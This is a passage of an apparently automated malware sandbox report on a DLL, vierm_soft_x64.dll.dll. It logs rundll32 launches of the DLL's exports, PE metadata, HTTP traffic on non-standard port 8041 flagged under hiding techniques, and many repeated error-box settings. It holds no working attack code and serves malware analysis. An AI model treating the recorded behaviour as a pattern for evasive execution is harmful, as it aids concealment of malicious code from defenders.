                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXAJump to behavior
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXCJump to behavior
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXDJump to behavior
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXSJump to behavior
                  Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",GetDeepDVCStateJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",#1Jump to behavior
                  Source: C:\Windows\System32\loaddll64.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\loaddll64.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: netapi32.dll
                  Source: C:\Windows\explorer.exeSection loaded: dsrole.dll
                  Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: vierm_soft_x64.dll.dllStatic PE information: Image base 0x180000000 > 0x60000000
                  Source: vierm_soft_x64.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: vierm_soft_x64.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: vierm_soft_x64.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: vierm_soft_x64.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: vierm_soft_x64.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: vierm_soft_x64.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: vierm_soft_x64.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: kernel32.pdbUGP source: rundll32.exe, 00000017.00000003.1428461278.0000029F3B7E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernelbase.pdbUGP source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\BUILD\work\b69487f8af4577da\BUILDSENG\Release\x64\ArPotEx64.pdb source: rundll32.exe, 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.1376710622.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000C.00000002.1415603065.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1417110861.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000012.00000002.1427586345.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000013.00000002.1403034734.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000014.00000002.1428897792.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000017.00000002.2565190812.000000018005F000.00000002.00000001.01000000.00000003.sdmp, vierm_soft_x64.dll.dll
                  Source: Binary string: ntdll.pdb source: rundll32.exe, 00000017.00000003.1411626568.0000029F3B7EA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernel32.pdb source: rundll32.exe, 00000017.00000003.1428461278.0000029F3B7E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000017.00000003.1411626568.0000029F3B7EA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernelbase.pdb source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp
                  Source: vierm_soft_x64.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: vierm_soft_x64.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: vierm_soft_x64.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: vierm_soft_x64.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: vierm_soft_x64.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: vierm_soft_x64.dll.dllStatic PE information: real checksum: 0x81152 should be: 0xbc113
                  Source: vierm_soft_x64.dll.dllStatic PE information: section name: memcpy_
                  Source: vierm_soft_x64.dll.dllStatic PE information: section name: _RDATA
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_3_0000029F3B7A00D8 push cs; retf 23_3_0000029F3B7A00FD
                  Source: C:\Windows\explorer.exeCode function: 30_2_089DEE21 push rsi; ret 30_2_089DEE27
                  Source: C:\Windows\explorer.exeCode function: 30_2_089DF5BA push rcx; ret 30_2_089DF5BC
                  Source: C:\Windows\explorer.exeCode function: 30_2_089DEF4F push D5912897h; iretq 30_2_089DEF57

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Uses known network protocols on non-standard ports
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49724
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49735
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49766
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49767
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49770
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49771
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49775
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49776
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49783
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49785
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49791
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49792
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49796
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49797
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
